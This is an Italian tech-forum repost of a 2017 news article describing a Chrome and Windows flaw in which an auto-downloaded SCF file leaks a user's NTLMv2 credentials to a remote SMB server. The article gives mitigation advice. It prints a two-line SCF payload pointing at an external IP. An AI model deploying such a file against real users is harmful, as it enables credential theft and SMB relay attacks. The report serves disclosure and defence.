Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > News - AV e sicurezza

Peugeot Polygon Concept: ecco il futuro delle utilitarie
Peugeot Polygon Concept: ecco il futuro delle utilitarie
Polygon è la concept car di Peugeot che mostra il futuro delle soluzioni del segmento B: tra design compatti e innovativi affiancati da dimensioni compatte uno scherzo dalla manovrabilità incredibile per le manovre a bassa velocità
Reno16 Pro: il compatto di OPPO punta su fotocamera da 200MP e il nuovo Bubble! La recensione
Reno16 Pro: il compatto di OPPO punta su fotocamera da 200MP e il nuovo Bubble! La recensione
OPPO ha portato in Italia, dal 1° luglio 2026, Reno16 Pro: display AMOLED da 6,32 pollici a 144Hz, tripla fotocamera con sensore principale da 200 megapixel, chip Dimensity 8550 Super e batteria da 6000mAh, al prezzo di lancio di 899 euro. Lo abbiamo provato per due settimane insieme al nuovo accessorio Bubble, per capire se la formula compatta della serie regge ancora di fronte a un listino da 1099 euro
 Hisense 55U7SE: tuttofare e accessibile, il MiniLED per film, sport e gioco
Hisense 55U7SE: tuttofare e accessibile, il MiniLED per film, sport e gioco
MiniLED di fascia media con local dimming a 192 zone, 144 Hz nativi e audio firmato Devialet. La prova strumentale riscontra colori affidabili e gaming reattivo, per un prodotto molto accessibile e convincente. Ma la soundbar aggiuntiva è quasi d'obbligo
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 23-05-2017, 09:01   #1
c.m.g
Senior Member
 
L'Avatar di c.m.g
 
Iscritto dal: Mar 2006
Messaggi: 22121
[NEWS] Chrome, un bug per rubare credenziali Windows

lunedì 22 maggio 2017

Spoiler:
Quote:
Il famoso browser di Google contiene un bug che se sfruttato potrebbe consentire agli hacker di rubare le credenziali di autenticazione della vittima e lanciare attacchi di tipo SMB Relay


Roma - Gli attacchi che coinvolgono il protocollo SMB su Windows sono un problema costante e gli exploit finora conosciuti sono innumerevoli. Recentemente un security engineerdi DefenseCode, Bosko Stakanovic ha scoperto una vulnerabilità dovuta alla configurazione di default di Google Chrome e al comportamento di Windows 10 nel trattamento dei file SCF.



Con questa configurazione di default il browser scarica automaticamente i file che ritiene sicuri senza interrogare l'utente sulla locazione in cui verrà effettuato il download, ma usando la cartella presente di default.

L'estensione SCF (Windows Explorer Shell Command) è utilizzata dai tempi di Windows 98 per creare dei file speciali con icona personalizzata in grado di richiamare funzionalità di sistema, come ad esempio il collegamento "Mostra Desktop".Come spiegato da Stakanovich una volta che l'utente viene portato a cliccare su un link malevolo questo innesca un download automatico di un file di tipo SCF, che induce Windows ad effettuare un tentativo di autenticazione a un server SMB remoto. Il file malevolo può contenere anche solo due righe, come nell'esempio seguente:

[Shell]
IconFile=\\170.170.170.170\icon

L'SCF, una volta scaricato, rimane dormiente finché la vittima non apre la cartella "Download", dopodiché, senza bisogno che l'utente clicchi sul file scaricato Windows, tenterà automaticamente di raggiungere "l'icona" specificata, presentando le sue credenziali al server remoto.
Ciò fornisce all'attaccante l'username della vittima e l'hash NTLMv2 delle password, che potranno essere utilizzati offline per il cracking o per accedere direttamente ad altri servizi che accettano lo stesso tipo di autenticazione.

Stakanovich sostiene che questo attacco può essere usato anche per perpetrare attacchi di tipo SMB relay: le organizzazioni che permettono accesso remoto a servizi come Microsoft Exchange e usano NTLM come metodo di autenticazione potrebbero essere vulnerabili, permettendo all'hacker di accedere ai dati senza dover rompere la password.

Questi tipi di attacchi permettono a utenti malevoli di impersonare altri soggetti, perciò sono un problema anche per le grandi aziende; le credenziali rubate possono essere utilizzate in tempi successivi al loro furto per eseguire privilege escalation al fine di prendere il controllo delle risorse IT.
Per gli utenti di Windows 8/10 che usano un account Microsoft, invece che l'account locale, avranno impatto anche su tutti i servizi Microsoft collegati (Outlook.com, Office360 ecc.).

Al momento, Chrome sta lavorando a un fix. Nel frattempo, per proteggersi dagli impatti della vulnerabilità, si raccomanda di disabilitare il salvataggio automatico dei file in Chrome andando nel menu Impostazioni/Mostra impostazioni avanzate e selezionando l'opzione Richiedi dove salvare ogni file prima di scaricare.
Inoltre, è consigliabile limitare il traffico SMB alle reti private, configurando il firewall di modo da bloccare le porte 137, 138, 139 e 445 verso la rete Internet.

Ilaria Di Maro





Fonte immagine: http://cdn.images.express.co.uk/img/...445/805729.jpg

Fonte: Punto Informatico
__________________
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Peugeot Polygon Concept: ecco il futuro delle utilitarie Peugeot Polygon Concept: ecco il futuro delle ut...
Reno16 Pro: il compatto di OPPO punta su fotocamera da 200MP e il nuovo Bubble! La recensione Reno16 Pro: il compatto di OPPO punta su fotocam...
 Hisense 55U7SE: tuttofare e accessibile, il MiniLED per film, sport e gioco Hisense 55U7SE: tuttofare e accessibile, il Min...
Kindle Scribe Colorsoft: riduce le cornici e diventa a colori, ma il prezzo è alto Kindle Scribe Colorsoft: riduce le cornici e div...
L'IA cambia tutte le regole della sicurezza tra vulnerabilità e sorveglianza. Intervista al CEO di Proofpoint L'IA cambia tutte le regole della sicurezza tra ...
Madrid mette al bando Palantir da appalt...
Torio, stampa 3D e niente uranio: il pia...
Una falla enorme in MSI Center metteva a...
Steam Machine è un 'ritorno ai te...
Il 2026 sarà un anno nero per i n...
Google reimmagina la Dichiarazione d'Ind...
C'è un SSD cinese in uno dei note...
Gene Wilder torna a parlare dopo 10 anni...
ChatGPT genera immagini shock con un pro...
Come il Giappone trasforma la segnaletic...
Apple potrebbe aver sospeso il progetto ...
Nintendo non seguirà l'esempio di...
Motorola ha lanciato un'app dedicata all...
Cyberpunk 2077 non si ferma e raggiunge ...
Samsung alza ancora i prezzi delle memor...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 08:37.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v